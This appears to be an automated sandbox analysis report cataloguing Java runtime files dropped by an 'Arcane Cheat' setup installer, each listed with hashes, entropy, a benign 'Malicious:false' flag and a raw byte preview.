                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\messages_pt_BR.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1319), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3317
                                Entropy (8bit):4.869662880084367
                                Encrypted:false
                                SSDEEP:48:3c6BeKTDcUsLYg9tStwmx+supWBxKy0HgKe1u6K0NCMc6MTNTjtA7NZdlw7ZHAW:3c6fbEf1mxPuUBxKy4va+mZdlw7Z7
                                MD5:4078691AB22C4F0664856BE0C024A52F
                                SHA1:6247FC05DE429F65DC4E1356C4715DC51F43B98F
                                SHA-256:6869B27B12B99C9D169B3E018284BE0F7631DBDF2DDD5F4EA5B1A458736FDFDF
                                SHA-512:BB02765F69E23C732C790EB994800C83BB8EFE7FF8CE0BCDC475EC5A29CEF5A33A5513AB1A7DC9F0F066B807A0980C41EC0037710873A32BD2952DBED79D24CA
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2016, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=erro interno, mensagem desconhecida..error.badinst.nojre=Instala\u00E7\u00E3o incorreta. Nenhum JRE encontrado no arquivo de configura\u00E7\u00E3o..error.launch.execv=Erro encontrado ao chamar Java Web Start (execv)..error.launch.sysexec=Erro encontrado ao chamar Java Web Start (SysExec) ..error.listener.failed=Tela Inicial: falha em sysCreateListenerSocket..error.accept.failed=Tela Inicial: falha na fun\u00E7\u00E3o accept..error.recv.failed=Tela Inicial: falha na fun\u00E7\u00E3o recv..error.invalid.port=Tela Inicial: n\u00E3o reativou uma porta v\u00E1lida..error.read=Ler ap\u00F3s o final do buffer..error.xmlparsing=Erro durante o parsing de XML: tipo incorreto de token encontrado..error.splash.exit=Saindo do processamento da tela inicial do Java Web .....\n..# "Last WinSock Error" means the error message

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\messages_sv.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1386), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3441
                                Entropy (8bit):4.927824210480987
                                Encrypted:false
                                SSDEEP:96:KYD1QNsQZ/lmo8ZuLgdBGpv3JRJ/7coh91XlK7Q/vm2QAfO:9D1+sCmapce1KGm2QIO
                                MD5:81BBDEA4DC9803A6EB78CE7D5CA018ED
                                SHA1:9AAF012276AD89CE7273CF5F0BE4C95B72D906AB
                                SHA-256:565B8FF1F31784378884D9D7468FFDFDDA5B001ACB5BB393A5006AC19BE4E67A
                                SHA-512:310017DD27C91C492188737494DA04CAB241D0BF4E91326AFB4A3F98CBFF78A6C0BBC14EC7E883597E9D506FAA80BA4E9A25B5F46BFD2543850323061E829A84
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=internt fel, ok\u00E4nt meddelande..error.badinst.nojre=Felaktig installation. Ingen JRE har hittats i konfigurationsfilen..error.launch.execv=Ett fel intr\u00E4ffade under starten av Java Web Start (execv)..error.launch.sysexec=Ett fel intr\u00E4ffade under starten av Java Web Start (SysExec) ..error.listener.failed=V\u00E4lkomstsk\u00E4rm: sysCreateListenerSocket utf\u00F6rdes inte..error.accept.failed=V\u00E4lkomstsk\u00E4rm: kunde inte accepteras..error.recv.failed=V\u00E4lkomstsk\u00E4rm: kunde inte mottaga..error.invalid.port=V\u00E4lkomstsk\u00E4rm: \u00E5terskapade inte en giltig port..error.read=L\u00E4ste f\u00F6rbi slutet av bufferten..error.xmlparsing=XML-tolkningsfel: fel typ av igenk\u00E4nningstecken hittades..error.splash.exit=Java Web Start - v\u00E4lkomstsk\u00E4rmen avslutas .....\n..# "Last

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\messages_zh_CN.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1857), with CRLF line terminators
                                Category:dropped
                                Size (bytes):4104
                                Entropy (8bit):5.04197285715923
                                Encrypted:false
                                SSDEEP:96:Me7R8zl0Zf4z3X4Gv2hEpeStEKADydYL1WfK0eSm91j7:1R8pOfWHJvOJT1WPtK1j7
                                MD5:823D1F655440C3912DD1F965A23363FC
                                SHA1:50B941A38B9C5F565F893E1E0824F7619F51185C
                                SHA-256:86663DED105B77261C0556468A93BC8666A094B918299A61AF0A8E30F42019C7
                                SHA-512:1EBF989D2121CF05FFC912B9B228C4D4523763EB1A689EC74568D811C88DCF11032FFC8007BB24DAF7D079B580662B77D94B4B8D71A2E891EF27979FF32CD727
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5185\u90E8\u9519\u8BEF, \u672A\u77E5\u6D88\u606F..error.badinst.nojre=\u9519\u8BEF\u5B89\u88C5\u3002\u914D\u7F6E\u6587\u4EF6\u4E2D\u627E\u4E0D\u5230 JRE..error.launch.execv=\u8C03\u7528 Java Web Start (execv) \u65F6\u9047\u5230\u9519\u8BEF..error.launch.sysexec=\u8C03\u7528 Java Web Start (SysExec) \u65F6\u9047\u5230\u9519\u8BEF..error.listener.failed=\u542F\u52A8\u5C4F\u5E55: sysCreateListenerSocket \u5931\u8D25..error.accept.failed=\u542F\u52A8\u5C4F\u5E55: \u63A5\u53D7\u5931\u8D25..error.recv.failed=\u542F\u52A8\u5C4F\u5E55: recv \u5931\u8D25..error.invalid.port=\u542F\u52A8\u5C4F\u5E55: \u672A\u6062\u590D\u6709\u6548\u7AEF\u53E3..error.read=\u8BFB\u53D6\u8D85\u51FA\u7F13\u51B2\u533A\u7ED3\u5C3E..error.xmlparsing=XML \u89E3\u6790\u9519\u8BEF: \u53D1\u73B0\u9519\u8BEF\u7684\u6807\u8BB0\u7C7B\u578B..error.s

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\messages_zh_HK.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1729), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3784
                                Entropy (8bit):5.17620120701776
                                Encrypted:false
                                SSDEEP:96:wMWzQq8x9i7zO/JOFtUtQzy+gawZFomWdYQCfQ/ydQCyA:LWzQqms7S/JDtQcJoHWQaQ/6QCH
                                MD5:4287D97616F708E0A258BE0141504BEB
                                SHA1:5D2110CABBBC0F83A89AEC60A6B37F5F5AD3163E
                                SHA-256:479DC754BD7BFF2C9C35D2E308B138EEF2A1A94CF4F0FC6CCD529DF02C877DC7
                                SHA-512:F273F8D501C5D29422257733624B5193234635BD24B444874E38D8D823D728D935B176579D5D1203451C0CE377C57ED7EB3A9CE9ADCB3BB591024C3B7EE78DCD
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F..error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE..error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4..error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4..error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557..error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557..error.recv.failed=Splash: recv \u5931\u6557..error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9..error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E..error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E..error.splash.exit=Java Web Start \u9583\u73FE\u87A2

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\messages_zh_TW.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1729), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3784
                                Entropy (8bit):5.17620120701776
                                Encrypted:false
                                SSDEEP:96:wMWzQq8x9i7zO/JOFtUtQzy+gawZFomWdYQCfQ/ydQCyA:LWzQqms7S/JDtQcJoHWQaQ/6QCH
                                MD5:4287D97616F708E0A258BE0141504BEB
                                SHA1:5D2110CABBBC0F83A89AEC60A6B37F5F5AD3163E
                                SHA-256:479DC754BD7BFF2C9C35D2E308B138EEF2A1A94CF4F0FC6CCD529DF02C877DC7
                                SHA-512:F273F8D501C5D29422257733624B5193234635BD24B444874E38D8D823D728D935B176579D5D1203451C0CE377C57ED7EB3A9CE9ADCB3BB591024C3B7EE78DCD
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F..error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE..error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4..error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4..error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557..error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557..error.recv.failed=Splash: recv \u5931\u6557..error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9..error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E..error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E..error.splash.exit=Java Web Start \u9583\u73FE\u87A2

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\splash.gif (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 320 x 139
                                Category:dropped
                                Size (bytes):8590
                                Entropy (8bit):7.910688771816331
                                Encrypted:false
                                SSDEEP:192:91m4OqvVyG+LMIcBc2qPjHmxJCCG/h97dIYhOX:9/OqdivcqzjH3tfDE
                                MD5:249053609EAF5B17DDD42149FC24C469
                                SHA1:20E7AEC75F6D036D504277542E507EB7DC24AAE8
                                SHA-256:113B01304EBBF3CC729A5CA3452DDA2093BD8B3DDC2BA29E5E1C1605661F90BE
                                SHA-512:9C04A20E2FA70E4BCFAC729E366A0802F6F5167EA49475C2157C8E2741C4E4B8452D14C75F67906359C12F1514F9FB7E9AF8E736392AC8434F0A5811F7DDE0CB
                                Malicious:false
                                Preview:GIF89a@................................................FFF...T..W..V..Is.Kv.W..W..U..Hr.P|.O{.Mx.Gq.Jt.Fo.Fp.V..U..Gp.T..Lw.P|.R..Q~.S..S..Nz.Lw.Hq.Ju.X..V..Lx.It.U..Hs.Ny.Nz.P}.R~.S..R~.R..Q}.Q}.My.Lv.It.O{.Ku.My.Oz.Gp.Gq.Hr.....................WWW.........Ry.uuu............i......ggg...]..................{..y..d..........Sz................s............i...............c............v.....X........r...........]........^........p.....z.........r..Y..l..m...............]................Mu........Qw.Nw.........v.....b..j.......V}.]........d.....k........v........Lu....S|.U{.Oy................W........Lv.U..R}.....Nv.Gp.Nx.Ks....Jr....Hq......V~.T..S~.Z.....Gq.O{.......W..Qz.......Lw.Z.....T...........S~....Lt.Kv....V.................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\splash@2x.gif (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 640 x 278
                                Category:dropped
                                Size (bytes):15276
                                Entropy (8bit):7.949850025334252
                                Encrypted:false
                                SSDEEP:192:onqkbSDLFgIBL0IgyZCE/oIuuemXclVO/HemZ8GbRdziHm6tIclW3ZYvvebtssZn:lKMLWkpgy8sdsnOmEyPLaYoauAdI
                                MD5:CB81FED291361D1DD745202659857B1B
                                SHA1:0AE4A5BDA2A6D628FAC51462390B503C99509FDC
                                SHA-256:9DD5CCD6BDFDAAD38F7D05A14661108E629FDD207FC7776268B566F7941E1435
                                SHA-512:4A383107AC2D642F4EB63EE7E7E85A8E2F63C67B41CA55EBAE56B52CECFE8A301AAF14E6536553CBC3651519DB5C10FC66588C84C9840D496F5AE980EF2ED2B9
                                Malicious:false
                                Preview:GIF89a..............................................FFF...W..V..Is.Hr.W..W..U..P|.T..Kv.O{.V..Mx....S..Fp.Jt.Lw.Gp.Gq.Lw.U..T..R..Q~.Fo.Nz.R~.R..Q}.My.Ju.It.Oz.Gp.Nz.Gq.V..Ny.Hq.P|.P}.S..S..S..Q}.Ku.Ku.Hr.Lx.X..Mx.It.U..Is.Hs.T..O{.R~.T..O{.Kv.My.Lv..........i...........]..WWWu...........ggguuut.......................................Ry.......{..............b..........................^..l.................X}....a..{.....c..................v..m........T{.f.....l........X.........................j..U|...........`........j..g..U~........^.....Qz.Jr.Nw.p.....v.....p.....Gp....r..Mt.......y..q.....]..Nv............Tz.Y.....[.....Pw....Ox..............X.....Y..X..W..V..S|............Mx....Mv.Kt.U..Hq.Lv.W.....Mu.i..Q{.Gq.Lt.S~.T..U..Kv................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\splash_11-lic.gif (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 320 x 139
                                Category:dropped
                                Size (bytes):7805
                                Entropy (8bit):7.877495465139721
                                Encrypted:false
                                SSDEEP:96:S88k2wenvMs3iHrSI3yy73VWOcaJpGvrrXqJBcqgbf5bD0jmzDBoqCN2IWsyh:SFHhs73n73V4airrXq41Ll3vBmN2YU
                                MD5:9E8F541E6CEBA93C12D272840CC555F8
                                SHA1:8DEF364E07F40142822DF84B5BB4F50846CB5E4E
                                SHA-256:C5578AC349105DE51C1E9109D22C7843AAB525C951E312700C73D5FD427281B9
                                SHA-512:2AB06CAE68DEC9D92B66288466F24CC25505AF954FA038748D6F294D1CFFB72FCC7C07BA8928001D6C487D1BF71FE0AF1B1AA0F35120E5F6B1B2C209BA596CE2
                                Malicious:false
                                Preview:GIF89a@...................................{...........c.....P|.l.....].............Ry.........S{.i.....U~........................uuuV..b........T.....WWW}..R~.......Hr.v..T|.It..........n.............e..f.....].........Hq.`........Y.....i..r.._..l...........]..Y.....v..................s..f.....z.....\........Jr.r.....................i..e.....p.....Y..m........Z..Sz.Ow....Y..Nx.{..w..Jr.T..R}....Pw.Lt.s..`..W..W..Lv...........................................FFF...W..V..Is.Kv.W..W..U..Hr.O{.Mx.Jt.Gq.Fp.Gp.Lw.Fo.U..T..Q~.R..P|.Lw.S..S..Ju.Nz.V..X..V..U..Ny.Hs.My.Ku.My.Q}.R~.P}.Q}.R..S..S..O{.Oz.Lx.Nz.Lv.It.Gp.Gq....ggg.....................S...............S|....Gp........Mw.S~.Px.Nz.Pz.......Lt.Kv.a.....V.....r.................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="ht

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\splash_11@2x-lic.gif (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 640 x 278
                                Category:dropped
                                Size (bytes):12250
                                Entropy (8bit):7.901446927123525
                                Encrypted:false
                                SSDEEP:192:Zzv4QPei/ueMFJ2M4xSGb/xGEyddpTa7Kv9I1BDc3KR3q6xmwJePYueHjAPZKGMr:5vTWvmxSGbkpTaYe1dc3KR3q7wJsOHmu
                                MD5:3FE2013854A5BDAA488A6D7208D5DDD3
                                SHA1:D2BFF9BBF7920CA743B81A0EE23B0719B4D057CA
                                SHA-256:FC39D09D187739E580E47569556DE0D19AF28B53DF5372C7E0538FD26EDB7988
                                SHA-512:E3048E8E0C22F6B200E5275477309083AA0435C0F33D1994C10CE65A52F357EE7CF7081F85C00876F438DFA1EE59B542D602287EC02EA340BFDF90C0C6ABD548
                                Malicious:false
                                Preview:GIF89a.......{.....k......{...........P|.b..V......................Hr.Hq.......................]...........X...........f.............i............R~....u..It.u.....l..T~.......Qz.......^..Q~....i.......b.............Qx.Y..Y.....q..p.....v..............a..U|......T..Y........................^..n........f.....Tz.e..j..f..Ox.p..Y~.Ov.......y..Z..h.....l.....W.....w.....R|.p.....X~.a........Pw.Ks.Ir.......^.....Kt.FFF\........Ox...........W..U..Nw.Mu.W..V..Is.V..Hr.R~.W..W..U..T..O{.Kv.Gp.S..Mx.Lw.Fp.Lw.U..T..Jt.R..Gq.Fo.Ju.My.R..Q}.R~.Nz.Oz.It.Nz.V..V..Gp.Ny.Ku.P|.Ku.Gq.P}.S..Q}.S..S..Is.Lx.U..O{.Hs.T..O{.My.Mx.Kv.Lv............iii...YYY.............xxx........._.....U..Gp.U..Lv.Mw....Oz......S|.S}.Hq.\..Kv....Mv.P{.W..T........Mw.T.....Nz.q..Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="ht

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\access-bridge-32.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):187736
                                Entropy (8bit):7.79606817499301
                                Encrypted:false
                                SSDEEP:3072:9Mxm+j7ZPrDuryFpqOv2xHamAIGiDZDo81qnI/vs7O04OvwFgBgvH6:ONduOJv29amxGiDtonI87aGBgva
                                MD5:13794986CA59819F6AF7BD70022D7F8F
                                SHA1:6C5609CD023EB001DC82F1E989D535CD7AD407EE
                                SHA-256:AF555DD438214DCD68D55EBDDCC0A05BF47DEF0EFD9920E3955D11CC2623628E
                                SHA-512:2E3C4E76FD911EFF5F6983D6D7FBB0F998E5FB0BFE11921A83AC9F19BFB0C28B157354F1AC790094C354845025AB42F5A921FDDF2A780497431F3912D7D3E518
                                Malicious:false
                                Preview:PK........z..H................META-INF/......PK..............PK........{..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............/...com/sun/java/accessibility/AccessBridge$1.class.S.n.@.=.........6.....BU.D.T..CQ.x.8+...F.u...$...>..B.....5.....9.gfg......St....,........sp....z*. ......".e........MG.|N..(...a.=..9!Tz.@..GJ.W./...s<..8&t.9...m......8..Jt.`..:....Q.?.a....H......y.$.Y..a.....m.c5...K.....'.....Y.`^.5..|..z_.q.*....]2p....[..P..b.A.C...W..j..(H3.....a.~...;.Z.^,.T...6QB..L.+g...%l_R....H.V..el&..#F.~6.1.9.C.g$M.+.vn..&........k 8 ...._..."G=.6P.#._@.o(}.........s`..Oy..A.Q&|...._a...c...2.....g$.+..k..:n.s7q..x....?PK....&.........PK...........H............0...com/sun/java/accessibility/AccessBridge$10.class.TYO.Q...e`.. ..X.j;...W.Z*j.u.....7ep.!3w._.1&...&....>.....q..m.s.{..l...._...n..0(IN.!...VajH`D.(.v.$.U....v....$g%9.!....N..T.Wq.!.d..e.Vj.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\access-bridge.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):187727
                                Entropy (8bit):7.7958934328326075
                                Encrypted:false
                                SSDEEP:3072:aMxm+j7ZPrDuryFpqOv2xHamAIGiDZDo81qnI/vs7O04OvwFgBPlHl:nNduOJv29amxGiDtonI87aGBPlF
                                MD5:82C16750374D5CCA5FDAA9434BAF8143
                                SHA1:9B49F07BFB6F4AE73EB9B2FADCAE46E02E31F023
                                SHA-256:1F0966EBD65544669395E9F490A3D397DCF122D5261566734BB422C68CFE64B8
                                SHA-512:12A32FBE2A0A824EC33BD6D0A22066C0CB74D13EEBC16622FFE420CD48B4EB5878C981384DEBE30285D6231B3224E5CD2380C22D8C18624E52E5C74B62221661
                                Malicious:false
                                Preview:PK........{..H................META-INF/......PK..............PK........{..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............/...com/sun/java/accessibility/AccessBridge$1.class.S.n.@.=.........6.....BU.D.T..CQ.x.8+...F.u...$...>..B.....5.....9.gfg......St....,........sp....z*. ......".e........MG.|N..(...a.=..9!Tz.@..GJ.W./...s<..8&t.9...m......8..Jt.`..:....Q.?.a....H......y.$.Y..a.....m.c5...K.....'.....Y.`^.5..|..z_.q.*....]2p....[..P..b.A.C...W..j..(H3.....a.~...;.Z.^,.T...6QB..L.+g...%l_R....H.V..el&..#F.~6.1.9.C.g$M.+.vn..&........k 8 ...._..."G=.6P.#._@.o(}.........s`..Oy..A.Q&|...._a...c...2.....g$.+..k..:n.s7q..x....?PK....&.........PK...........H............0...com/sun/java/accessibility/AccessBridge$10.class.TYO.Q...e`.. ..X.j;...W.Z*j.u.....7ep.!3w._.1&...&....>.....q..m.s.{..l...._...n..0(IN.!...VajH`D.(.v.$.U....v....$g%9.!....N..T.Wq.!.d..e.Vj.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\cldrdata.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):3860522
                                Entropy (8bit):7.9670916513081735
                                Encrypted:false
                                SSDEEP:98304:PI1SwP9utPgTIb0bxSxwF1nNZVdEILeH9IIyYNO4Inwz:PI1HYgkoxSxI9fs4UVIwz
                                MD5:AE86774D28F1C8270A9BCBD12A9A1865
                                SHA1:7806C70550F435C2C87D2D15E427E5A9F97774E4
                                SHA-256:0402FBCB23D381DEDE4DF4228F2D100D8693C5B3BAB885AB5EB98BCC0A269786
                                SHA-512:2EA1E0372A087915FFFCCA2DEFC817C37BD038B02824BFEC1DA4E881A4C908A93AEB37DAA38840F75BCEAFD02EC09088FE648B0305DA0407E93407EAC770BE63
                                Malicious:false
                                Preview:PK........s..H................META-INF/......PK..............PK........s..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.q.B........E..%.).N. e.z.......E..9....E..E.%@...\.\.PK...n..N...Z...PK...........H................sun/text/resources/cldr/aa/FormatData_aa.classmPMO.@.}........(.@..xB....!b,1i8..6X..I.5._.'.....(..".9.yy3.f?..?..`?...*6T.5l....aG......=...mqN.......t...:6g.;`^....d.L..\0.|.b...w&.....c.;...8%H...........RqA.......b. ..p./G......B0..K.Sx6...>4\....Zy.!..".R.N....T....=..c~d.7...3(5.<.....a;F....\....a8@..a.@..d^.]YV"k....U...2'#...rX.K...ue...O....bZ.:CB...jZ.]3...2M.s....3}.ct%.GV..PK...]..d.......PK...........H................sun/text/resources/cldr/af/FormatData_af.classuV.x[W.>...a[y......R.+-..K].I.4..(...b.=....a.h...({..B!...{.U......w../...y...?.;w>.u..w..A.......xE.nFxe.nAx...^.p+.k.^..z.7 ...M.oFx..[...v.3..!.....Bx7.{.nGx/....@x?...."..A..!|....G.>..1..#|....B......A.,...>..../"|...._A.*........o"|.....A...........".

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\dnsns.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):8286
                                Entropy (8bit):7.790619326925194
                                Encrypted:false
                                SSDEEP:192:tX5jIgU7WbMCc0XmHTEIWB7EH+mqcEb+wYtvEmkbKdG:tXZU7WbMoWTFWBAH+BCrEmkh
                                MD5:7FA7F97FA1CC0CC8ACC37B9DAE4464AE
                                SHA1:C143646A6DBE2EBDB1FBF69C09793E7F07DBC1F5
                                SHA-256:36820223C5B9A225DC3FF7C1C3930BDB112F1D9AAB2BEE954FF1A1C1828E2C54
                                SHA-512:AD9A0E358BE7A765B4A554E6BBE35BDD61A52BCAC9F21915D84C2A1929780150DFDCF0E43121D0E844082B1BB92873ED848ACF9B38FF3C7D826E5D0F5D32C26C
                                Malicious:false
                                Preview:PK........s..H................META-INF/......PK..............PK........s..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............2...sun/net/spi/nameservice/dns/DNSNameService$1.class.S]O.A.=......./@."e.,(>AH.` )..g.......l../j....LD..F_.M.xw.j.....s.{g.~.........d.n...9.0e.N..i.E.......~A.&.H..7....[<.7|....]f_.....r.)W....*~(B....nM..F.Z!.z.....Ye.(...B.3..2.AM0......pO..x.!.#.0U.I.G..Tu.&..L.......e.![.U..;...-.2.6.<.02P..9...R.......la...*.H....!.."-..H..E].Z.k^.W:p.J^s. .x .c..7j>.A..T...TfG...f....!.6zm.p.F..-.q.K.....1.!.w.C+,2..J....0.!C...0Lw...@..s[.cmp%I-.5..o...1.D].]q..4..-.t1...m.q.3.;\....D.+/..../...N....uv...R.|<<.2M...4...O.yz.F*A...).3{.....7....]..g.i..9&m.[.......K_.}.,;)}F..VR.w........|I.+..B.a...F.-C....h......Y...N...t..D.:.<..d..u`..r..B...PK..K.".u.......PK...........H............2...sun/net/spi/nameservice/dns/DNSNameService$2.class.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\is-1S1SJ.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):1178848
                                Entropy (8bit):7.964832897711047
                                Encrypted:false
                                SSDEEP:12288:qLvFVMHxMyEg7+dYmx0nqEdgq2C942bjAHcOveMdDLtHHicwqJM5SznKMWKdk/H2:cF9rYmxQ5tOcOdFwqSYzn0DfYHs4jOBK
                                MD5:24857AD811CEDA70BD0F087FD28B5B6E
                                SHA1:707305EB10B1464D40BDEABADE77B80B984A621A
                                SHA-256:321D646AD29A5B180CA98BB49E81C2C732523B7E5145A3C568766CEC06B2B1CD
                                SHA-512:A10A340BDB2DE2D0D14ED804F04313D1D4CBD64EF0513A9E54B7FA95FFB05F2123C9095A4B2BFFA4DDF3ADEA9A67E978D26D115A8F5677AE1BD0EE67C416FA5A
                                Malicious:false
                                Preview:PK........u..H................META-INF/......PK..............PK........u..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............,...sun/text/resources/ar/CollationData_ar.classm..O.A...Y[("...E..Q.....z....M.1A.f....m.n.G|._.WP@.R^T.D._.......b.N.H.....<..!._....!...j...#bCD.U..*.1"6ED.#*[..xp....;.:"....Q..O.'..:....3..5.~.J.~2.8.a.......e/....S....A.#.c.l...<n.ljM%.^.O%.y.w.K.;jD.X...._......,.B'\.;'.K.{...x.G..cL...9^`..x.W..0F....!...P.8&0.)..[..+.e.T.\.+w."g.YW.E...]....[....c....}.(.b..m1n..<`..[,..-&m...C.....W....}..k>y..x.....X K.fY..1.1..L.z.;.K.....n}..4...f0..|6.}..0..X."..+=.........n...6.Y.............l.o..%..w.8Ks..gq......3t/8C.........~<..<.3<....%....0F...(r..1..\5s..UO..jf..L..f...........................!.!.!.!.!.!.a..............................n&..... ..3.76.....#....l.OD......G.../..J.W..*...k5.V..........?.V..6...F...t.....X...X.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\is-22GBI.tmp

                                Download File
